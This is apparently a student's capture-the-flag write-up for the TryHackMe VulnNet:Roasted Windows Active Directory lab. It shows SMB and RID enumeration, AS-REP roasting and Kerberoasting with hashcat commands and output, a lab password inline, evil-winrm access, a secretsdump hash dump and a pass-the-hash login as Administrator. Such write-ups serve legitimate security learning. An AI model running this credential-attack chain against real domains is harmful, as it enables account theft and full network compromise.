TryHackMe | VulnNet:Roasted

A room on TryHackMe created by TheCyb3rW0lf featuring a Windows machine.

VulnNet:Roasted

Tasks

  • user.txt

Vulnerabilities

  • IPC$ share is readable as anonymous leading to enumeration of users.

Sources I used

https://www.secureauth.com/labs/open-source-tools/impacket/
https://hashcat.net/wiki/doku.php?id=example_hashes
https://github.com/Hackplayers/evil-winrm
https://forum.hackthebox.eu/discussion/2749/getnpusers-py-explained-video

NMAP

I performed a quick scan but unfortunately I didn’t find anything interesting so I decided to a full port scan.

PORT      STATE SERVICE       REASON  VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-05-15 12:15:12Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49683/tcp open msrpc syn-ack Microsoft Windows RPC
49722/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 11019/tcp): CLEAN (Timeout)
| Check 2 (port 58301/tcp): CLEAN (Timeout)
| Check 3 (port 33626/udp): CLEAN (Timeout)
| Check 4 (port 39481/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-15T12:16:12
|_ start_date: N/A

SMB

Since port 445 is open, samba is available to be used. Let’s use our best tool enum4linux.

Enum4linux

======================================== 
| Share Enumeration on 10.10.6.241 |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
SMB1 disabled -- no workgroup available

Not much information we got. Let’s use our second tool in line.

SMBMAP

Disk                                                    Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY

We have 3 shares that are readable.
Readable means enumeration is possible, and I’m more interested in IPC$ which usually isn’t readable.We can use Impacket tools for this or to be more specific lookupsid.py.

498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Let’s grab the SidTypeUser and format them a bit prettier.

Administrator
Guest
krbtgt
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

Now we have a list of possible users and now just need passwords.

  • We have a service named kerberos on port 88, perhaps we can use it with a script in Impacket.
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:ff4927716c8181cc58c64c6a642b8693$f491faf9106dcf927e087cc4d736d2b54254c3c579cdb62740f846b8dc0c23b6a9b7255c8e2dd211553b8407612188dfe579f8b5fee567f904de342d6c3d3397ab79383d63eb219d8d3166307ca0ded85d76d60e54eec1e3436962df42371cabb13dc1b5db51810d933438b72e804960af196653c8afca3e23b533a955acdf9de6bb2e31117606094dd8863977a08fc070110faad21360b829b71f35946e23458225bc2289895b5c25472478f4c0e4ae57de57f15945aee0e65027510927e9df2a50552e138bcde7115e587c656f459a5b51daa032251fc1c6acb484d4bafb323c1c756e749f82d67e3f9962f0445069
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

Looks like we have a hash for user t-skid.

  • Since this is from Kerberos, let's look for the hash on Hashcat if there is one.
18200  Kerberos 5 AS-REP etype 23

Luck be on our side because there is.
You can use Hashcat or John for this task.

┌─[faris@parrot]─[~/ctf]
└──╼ $hashcat -a 0 -m 18200 hash.hash ~/rockyou.txt -o cracked.txt
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$t-skid@VULNNET-RST:ff4927716c8181cc58...445069
Time.Started.....: Sat May 15 21:35:09 2021 (7 secs)
Time.Estimated...: Sat May 15 21:35:16 2021 (0 secs)
Guess.Base.......: File (/home/faris/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 485.0 kH/s (12.23ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3178496/14344385 (22.16%)
Rejected.........: 0/3178496 (0.00%)
Restore.Point....: 3170304/14344385 (22.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: tkwyr9nrj8 -> tj030499

You'll have to figure out the cracked password yourself :P

  • Next, we can use GetUsersSPN.py
python3 /home/faris/impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:tj072889*' -outputfile kerb.hash -dc-ip $IP

Looking at the output file, it doesn't seem to be the same hash like the last one, let's check out Hashcat hashes again and try to figure it out.

7500 Kerberos 5 AS-REQ Pre-Auth etype 23
13100 Kerberos 5 TGS-REP etype 23
  • Found two possibilities, the first one doesn't work so must be the second one!
┌─[✗]─[faris@parrot]─[~/ctf]
└──╼ $hashcat -a 0 -m 13100 kerb.hash ~/rockyou.txt -o cracked2.txt
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$V...f99475
Time.Started.....: Sat May 15 21:44:31 2021 (9 secs)
Time.Estimated...: Sat May 15 21:44:40 2021 (0 secs)
Guess.Base.......: File (/home/faris/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 441.2 kH/s (12.50ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4112384/14344385 (28.67%)
Rejected.........: 0/4112384 (0.00%)
Restore.Point....: 4104192/14344385 (28.61%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ryannb<3 -> rutie12

And again you have to crack it by yourself since password cracking should be the least hard task :P.

Foothold

Since we have the password for 'enterprise-core-vn', we can try to connect to the server using evil-winrm.

  • WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol.
evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents>

Might take a while to connect if you're on a slow connection.
Our user.txt flag should be on the desktop

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> type user.txt

Use the type/cat command to output the contents of the file!

Looking around I couldn't find anything to do or I'm just bad at Windows. So I went back looking at SMB shares with the found credentials. SYSVOL and NETLOGON wasn't accessible as anonymous so perhaps we can access it with our ‘enterprise-core-vn’ credentials.

Disk                                                    Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing

Looks like we have read permissions.Let's connect to the share using smbclient

smb: \vulnnet-rst.local\scripts\> ls
. D 0 Wed Mar 17 07:15:49 2021
.. D 0 Wed Mar 17 07:15:49 2021
ResetPassword.vbs A 2821 Wed Mar 17 07:18:14 2021

Looks like there is a script to reset a password? Let's get it and look around for now. Looking around the other directories I didn't find anything interesting or to be honest anything that I understand.

strUserNTName = "a-whitehat"
strPassword = "[PLS_CRACK_LAST_PASSWORD_NO_CHEATING]"

Looks like another credential left lying in a file unhashed. Maybe we can find more shares with this credentials?

Disk                                                    Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ, WRITE Logon server share
SYSVOL READ, WRITE Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing

Looks like we have write permissions, maybe we can perform remote code execution but honestly I don’t know. In another part,since this user has higher permissions, let's try to dump hashes using secretsdump.py on vulnnet-rst.local that we found on the SYSVOL share.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:[ADMIN PASSWORD]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

The admin password is dumped in NT hash, but we can log in using that hash with evil-winrm!

Evil-WinRM* PS C:\Users\Administrator\Documents>

And looks like we managed to get an Administrator account, head to Desktop to find the system.txt flag.

This room was a bit tricky and I spent around 2 hours figuring it out since I'm not very good at Windows machine, but with a bit of research and googling I found out what I wanted :)

Disclaimer : I’m not very good at Windows machine so please excuse my mistake or weak explaination.

Student that loves FOSS